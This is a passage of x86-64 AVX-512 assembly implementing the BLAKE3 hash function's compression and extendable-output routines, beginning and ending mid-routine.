vpinsrd xmm14, xmm14, dword ptr [rsp+0x40], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vpinsrd xmm3, xmm14, eax, 3
vmovdqa xmm2, xmm15
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
_blake3_compress_in_place_avx512:
blake3_compress_in_place_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vmovdqu xmmword ptr [rdi], xmm0
vmovdqu xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
_blake3_compress_xof_avx512:
blake3_compress_xof_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vpxor xmm2, xmm2, [rdi]
vpxor xmm3, xmm3, [rdi+0x10]
vmovdqu xmmword ptr [r9], xmm0
vmovdqu xmmword ptr [r9+0x10], xmm1
vmovdqu xmmword ptr [r9+0x20], xmm2
vmovdqu xmmword ptr [r9+0x30], xmm3
ret
.p2align 6
blake3_xof_many_avx512:
_blake3_xof_many_avx512:
_CET_ENDBR
mov r10,QWORD PTR [rsp+0x8]
cmp r10,0x1
ja 2f
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
movzx eax,r8b
movzx edx,dl
shl rax,0x20
add rdx,rax
vmovq xmm3,rcx
vmovq xmm4,rdx
vpunpcklqdq xmm3,xmm3,xmm4
vmovaps xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
ret
.p2align 6
2:
push rbp
mov rbp,rsp
sub rsp,0x90
and rsp,0xffffffffffffffc0
vpbroadcastd zmm0,ecx
shr rcx,0x20
vpbroadcastd zmm1,ecx
vpaddd zmm2,zmm0,ZMMWORD PTR [ADD0+rip]
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
cmp r10,0x10
jb 2f
3:
vpbroadcastd zmm16,DWORD PTR [rsi]
vpbroadcastd zmm17,DWORD PTR [rsi+0x4]
vpbroadcastd zmm18,DWORD PTR [rsi+0x8]
vpbroadcastd zmm19,DWORD PTR [rsi+0xc]
vpbroadcastd zmm20,DWORD PTR [rsi+0x10]
vpbroadcastd zmm21,DWORD PTR [rsi+0x14]
vpbroadcastd zmm22,DWORD PTR [rsi+0x18]
vpbroadcastd zmm23,DWORD PTR [rsi+0x1c]
vpbroadcastd zmm24,DWORD PTR [rsi+0x20]
vpbroadcastd zmm25,DWORD PTR [rsi+0x24]
vpbroadcastd zmm26,DWORD PTR [rsi+0x28]
vpbroadcastd zmm27,DWORD PTR [rsi+0x2c]
vpbroadcastd zmm28,DWORD PTR [rsi+0x30]
vpbroadcastd zmm29,DWORD PTR [rsi+0x34]
vpbroadcastd zmm30,DWORD PTR [rsi+0x38]
vpbroadcastd zmm31,DWORD PTR [rsi+0x3c]
vpbroadcastd zmm0,DWORD PTR [rdi]
vpbroadcastd zmm1,DWORD PTR [rdi+0x4]
vpbroadcastd zmm2,DWORD PTR [rdi+0x8]
vpbroadcastd zmm3,DWORD PTR [rdi+0xc]
vpbroadcastd zmm4,DWORD PTR [rdi+0x10]
vpbroadcastd zmm5,DWORD PTR [rdi+0x14]
vpbroadcastd zmm6,DWORD PTR [rdi+0x18]
vpbroadcastd zmm7,DWORD PTR [rdi+0x1c]
vpbroadcastd zmm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd zmm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd zmm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd zmm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa32 zmm12,ZMMWORD PTR [rsp]
vmovdqa32 zmm13,ZMMWORD PTR [rsp+0x40]
vpbroadcastd zmm14,edx
vpbroadcastd zmm15,r8d
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm24
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm23
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm27
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm21
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm21
